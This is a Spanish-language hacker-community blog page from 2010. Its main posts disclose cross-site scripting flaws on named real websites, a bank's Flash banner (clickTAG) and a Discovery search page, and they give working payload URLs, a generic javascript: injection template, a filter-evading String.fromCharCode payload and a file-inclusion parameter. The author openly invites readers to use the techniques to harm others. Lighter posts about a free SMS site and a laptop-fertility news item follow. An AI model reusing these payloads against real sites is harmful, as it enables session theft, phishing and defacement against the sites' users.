IpKi55 blog xDD

Publicado el 27/02/2010 12:02:00 en Bug Report. Total de votos: 2  Votar

Bueno gentes, hoy les quiero dar a conocer otro XSS que encontre en bancociudad.com.ar xDD
osea todavia d que stamos hasta el tope con los fastidios de la basura que es flash, por ejemplo al ver videos o peliculas online es un gran fastidio y pff que flojera siempre temrinamos busacndolo en otro server xDD,

el fallo consiste en que no se validan bien los parametros de entrada,al momento de programar el banner en actionscript

"getURL(_root.clickTAG, "_blank");"(todo lo que va adentro de las comillas)


y pues algunos diran donde se encuentra el xss o como lo exploto? pus facil xD

http://www.bancociudad.com.ar/flash/distrito_tecnologico-680x82.swf?clickTag=javascript:alert%28%22Owned%20BY%20IPkiss%22%29//

ah, y para el colmo, no es la unica variable que tambn tiene xSS tambn esta

getURL(_root.url, "_blank");


y pues "algunos diran" como lo kakeo? xDD

http://lawebconXSS/flash.swf?url=javascript:alert('lo que quieras poner')

Bueno diran, este tipo encontro el fallo en flash? no yo no lo encontre aqui dejo la url de la web donde encontre la noticia


http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml

quizas unos ia la conocian o no pero aqui esta xDD

yo la comporto y con una pagina que uds conocen (gente de arg)

jaja y buscando tambn en la misma web me encontre con esto:


http://www.bancociudad.com.ar/index_interno.php?head=&contenido=http://google.com

bueno el RFI no es explotable porque no pasa bn las variables, pero que weba scribir xDD

tambn otras de las cosas que se pueden hacer es acer es poner un iframe desde esa direccion , redirgiendo a otra web pero bueee....como lo dijo mi amigo k3rv3r0s
"poison frame"

o hacer todas las combinaciones y tecnicas que conoscan con el fin de fregarse alguien, quizas uds tengan mas imaginacion

--------------------------------------------------------------
URL del XSS

http://www.bancociudad.com.ar/flash/distrito_tecnologico-680x82.swf?clickTag=javascript:alert%28%22Owned%20BY%20IPkiss%22%29//

Url de imagen con XSS

http://img299.imageshack.us/i/xssenbancociudadcomar.jpg

URL del RFI

http://www.bancociudad.com.ar/index_interno.php?head=&contenido=http://google.com

bueno sino les funciona copienlo y peguenlo, y despues escriben la pagina y listo xD


bueno nos vemos gentes espero seguir posteando mas cosas ! agregen y saludos from Mexico xD .

ipkiss


Comentarios: 6 | Leer comentarios

Publicado el 25/02/2010 12:02:00 en Bug Report. Total de votos: 5  Votar

Bueno que tal,

hace rato venia viendo esta comunidad y pues ya todos andan subiendo articulos y cosas asi por lo regular, y pues no me quiero quedar atras xDD

tambn ire posteando otras paginas con xss, quizas a alguien le sirvan o que se yo bueno aqui esta el link, ah bueno no dejo la url para que la copien y pegen ya que esto, al momento de copiar todo el enlace me marca error en la pagina

http://search.discovery.com/search?proxystylesheet=ISSLTM&site=latamSpanDiscovery&client=ISSLTM&region=latam&output=xml_no_dtd&getfields=*&filter=1&ie=utf8&oe=utf8&q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%22%3E%27%3E&searchbtn=go


el xss es por el metodo String from char code
ya que si utlizamos ¨¨ o < o esas cosas
nos bloquearia y no nos dejaria hacer nada bueno saludos

Aki el link:
http://img21.imageshack.us/i/discoverychannelxss.png/

PD
se que sonara estupido pero nopude subir imagen jaja xdd

saludos a todas esas personas que le dedican tiempo para subir un post, ya que asi podemos aprender todos de todos..
bytes



Comentarios: 3 | Leer comentarios

Publicado el 18/02/2010 12:02:00 en Phreaking.

Buenas tardes...
Vengo tiempo pasando por aca y pues aqui es una comunidad donde todos debemos de colaborar.. XD

Sin mas Show

A quien le a pasado que quiere mandar un sms y no tiene credito?
http://www.smsflick.com/index.php
O estas en apuros y no tienes celular solo tienes una conexion a internet y nececitas comunicarte con esa persona? Aqui la respuesta :D

Esta pagina permite mandar cualquier sms a cualquier parte del mundo

solo basta con entrar y seleccionar el pais, no importa de que compañia sea puede ser movistar iusacel unefon telcel etc.

sin mas preambulos aqui esta la pagina y una cap de la pagina

http://www.smsflick.com/index.php



<img src="http://i694.photobucket.com/albums/vv301/gepe_album/SMS.jpg" />

lo puse en phreaking porque lo considere que alli era el lugar indicadoo

saludos! XD



Comentarios: 7 | Leer comentarios

Publicado el 10/02/2010 12:02:00 en Noticias.

Que tal ...
vengo rato conociendo esta web
pero no me eh tomado el tiempo de postear algo
XDD

buenoo... aki les dejo esta noticia quizas unos ia la sabian o quizas otros no

por si las dudas aqui esta

¡Nooootiiiiicia de última hora!, investigadores han descubierto que el uso prolongado de computadores portátiles sobre las piernas en hombres puede, inadvertidamente, provocar un aumento de la temperatura de sus escrotos... y posiblemente dañar su esperma.



Desde la web de la noticia dicen:

Los portátiles sobre las piernas producen hyperthermia escrotal tanto por el efecto directo de calentamiento del procesador como por la posición de sentado necesaria para balancear el computador


Hasta que futuros estudios provean mas información de este tipo de exposición térmica, los hombres jóvenes deberían considerar limitar el uso de portátiles en sus piernas, ya que su prolongado uso puede tener un efecto de decremento en su salud reproductiva



Así que un servidor pregunta; ¿Y ahora que hacemos?, ¿Instalarnos un sistema de enfriamiento de procesadores en los huevos?, ¿Comprar portátiles en vez de condones?

fuente :

http://www.cristalab.com/blog/los-computadores-portatiles-te-pueden-hacer-infertil-c2485l/


Comentarios: 1 | Leer comentarios

Publicado el 30/11/-0001 12:11:00 en Off-Topic.

Este blog aún no ha sido editado. Para editar tu blog haz click aqu&iacute;.




Comentarios: 0 | Leer comentarios

Ver: Siguientes 5